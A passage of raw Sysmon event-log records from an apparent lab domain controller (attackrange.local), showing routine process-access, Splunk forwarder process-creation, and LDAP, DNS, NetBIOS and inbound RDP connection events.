09:20:22.125{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054132Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.125{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054131Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.125{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054130Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.125{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054129Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.125{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054128Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.125{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054127Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.125{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054126Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.125{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054125Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.125{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD6-6151-6500-00000000FD01}3672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054124Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.125{5EBD8912-8CD0-6151-3000-00000000FD01}19563432C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CD6-6151-6500-00000000FD01}3672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054123Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.127{5EBD8912-8CD6-6151-6500-00000000FD01}3672C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001054122Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.521{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49696-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001054121Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.521{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49696-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001054120Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.407{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-64240-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001054119Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.359{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64184- 354300x80000000000000001054118Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.347{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-429.attackrange.local138netbios-dgm 354300x80000000000000001054117Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.347{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-429.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 354300x80000000000000001054116Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.347{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local61541- 354300x80000000000000001054115Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.975{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local61540- 354300x80000000000000001054114Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.974{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local51937- 354300x80000000000000001054113Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.974{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local61539- 354300x80000000000000001054112Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.974{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local61538- 10341000x80000000000000001054111Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.015{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD6-6151-6400-00000000FD01}3328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054110Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054109Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054108Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054107Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054106Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054105Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054104Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054103Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054102Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.015{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054101Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.015{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD6-6151-6400-00000000FD01}3328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054100Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:22.015{5EBD8912-8CD0-6151-3000-00000000FD01}19563432C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CD6-6151-6400-00000000FD01}3328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program 